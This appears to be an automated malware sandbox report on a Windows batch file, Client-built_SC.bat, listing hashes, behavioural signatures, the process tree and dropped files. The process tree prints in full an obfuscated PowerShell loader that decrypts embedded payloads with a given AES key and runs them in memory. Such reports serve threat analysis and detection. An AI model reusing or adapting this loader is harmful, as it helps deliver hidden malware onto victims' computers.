Analysis

  • max time kernel
    107s
  • max time network
    34s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    06/05/2023, 21:11

General

  • Target

    Client-built_SC.bat

  • Size

    329KB

  • MD5

    5909fb8dae48a1d7b1dda945c63d6b68

  • SHA1

    2edc8fe7b13cb2302a2cd22bcc4053222be45c5a

  • SHA256

    acc021400a40afad8c401ccac16041658be8c4ab6b3bf0dc8f185abad8e6bf67

  • SHA512

    d35c9681def73fa4f8cd2317f6004accc027bf5563175cab98211008a817ea3d4f3bb10382d89b516af4e2adffba7692fe5453ac2d6e1faf37fa8446bbf4ceb9

  • SSDEEP

    6144:2V1dfUak+ChXZBxWdk+PMtO9XYu7VAQmYV878BvtTkpuS+dQc1oDUl:M1RUak+gX3xt+O+XQUQ81l1S/3G

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Client-built_SC.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:268
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -w hidden -c #
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1852
    • C:\Users\Admin\AppData\Local\Temp\Client-built_SC.bat.exe
      "C:\Users\Admin\AppData\Local\Temp\Client-built_SC.bat.exe" $XemT='ChIcLIaIcLInIcLIgIcLIeEIcLIxIcLItIcLIenIcLIsiIcLIoIcLInIcLI'.Replace('IcLI', '');$jOoA='EnIcLItIcLIryPIcLIoinIcLItIcLI'.Replace('IcLI', '');$LHwM='ReIcLIadLIcLIineIcLIsIcLI'.Replace('IcLI', '');$vFfa='FromIcLIBasIcLIe64IcLIStIcLIrinIcLIgIcLI'.Replace('IcLI', '');$ZytS='TIcLIranIcLIsIcLIforIcLImFiIcLInalIcLIBloIcLIckIcLI'.Replace('IcLI', '');$YSwp='SpIcLIlIcLIiIcLItIcLI'.Replace('IcLI', '');$kmzX='FirIcLIstIcLI'.Replace('IcLI', '');$YmFb='LIcLIoadIcLI'.Replace('IcLI', '');$WGFa='CreIcLIateDIcLIeIcLIcrIcLIyptIcLIorIcLI'.Replace('IcLI', '');$qToE='InIcLIvoIcLIkeIcLI'.Replace('IcLI', '');$XRnC='MaiIcLInMIcLIoduIcLIleIcLI'.Replace('IcLI', '');$nKRs='GetIcLICuIcLIrreIcLInIcLItPIcLIrocIcLIeIcLIssIcLI'.Replace('IcLI', '');function iInEA($iVniK){$YHhcw=[System.Security.Cryptography.Aes]::Create();$YHhcw.Mode=[System.Security.Cryptography.CipherMode]::CBC;$YHhcw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$YHhcw.Key=[System.Convert]::$vFfa('ezBHy8o5hhGbF6Vy0gPWRLgphuIvhUmLUYA6ELhefEE=');$YHhcw.IV=[System.Convert]::$vFfa('Mh7bAlUO3GrAJuIS5U4iIw==');$jpJUk=$YHhcw.$WGFa();$eCfYr=$jpJUk.$ZytS($iVniK,0,$iVniK.Length);$jpJUk.Dispose();$YHhcw.Dispose();$eCfYr;}function MuHmn($iVniK){$modmt=New-Object System.IO.MemoryStream(,$iVniK);$EidZA=New-Object System.IO.MemoryStream;$ROcje=New-Object System.IO.Compression.GZipStream($modmt,[IO.Compression.CompressionMode]::Decompress);$ROcje.CopyTo($EidZA);$ROcje.Dispose();$modmt.Dispose();$EidZA.Dispose();$EidZA.ToArray();}$bDNkj=[System.Linq.Enumerable]::$kmzX([System.IO.File]::$LHwM([System.IO.Path]::$XemT([System.Diagnostics.Process]::$nKRs().$XRnC.FileName, $null)));$kLvZW=$bDNkj.Substring(3).$YSwp(':');$ykLdT=MuHmn (iInEA ([Convert]::$vFfa($kLvZW[0])));$TsvBT=MuHmn (iInEA ([Convert]::$vFfa($kLvZW[1])));[System.Reflection.Assembly]::$YmFb([byte[]]$TsvBT).$jOoA.$qToE($null,$null);[System.Reflection.Assembly]::$YmFb([byte[]]$ykLdT).$jOoA.$qToE($null,$null);
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1776

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Client-built_SC.bat.exe

          Filesize

          442KB

          MD5

          92f44e405db16ac55d97e3bfe3b132fa

          SHA1

          04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d

          SHA256

          6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7

          SHA512

          f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

        • memory/1776-68-0x0000000002380000-0x00000000023C0000-memory.dmp

          Filesize

          256KB

        • memory/1776-69-0x0000000002380000-0x00000000023C0000-memory.dmp

          Filesize

          256KB

        • memory/1776-70-0x0000000002380000-0x00000000023C0000-memory.dmp

          Filesize

          256KB

        • memory/1852-58-0x0000000002740000-0x00000000027C0000-memory.dmp

          Filesize

          512KB

        • memory/1852-59-0x000000001B360000-0x000000001B642000-memory.dmp

          Filesize

          2.9MB

        • memory/1852-60-0x0000000001F20000-0x0000000001F28000-memory.dmp

          Filesize

          32KB

        • memory/1852-61-0x0000000002740000-0x00000000027C0000-memory.dmp

          Filesize

          512KB

        • memory/1852-62-0x000000000274B000-0x0000000002782000-memory.dmp

          Filesize

          220KB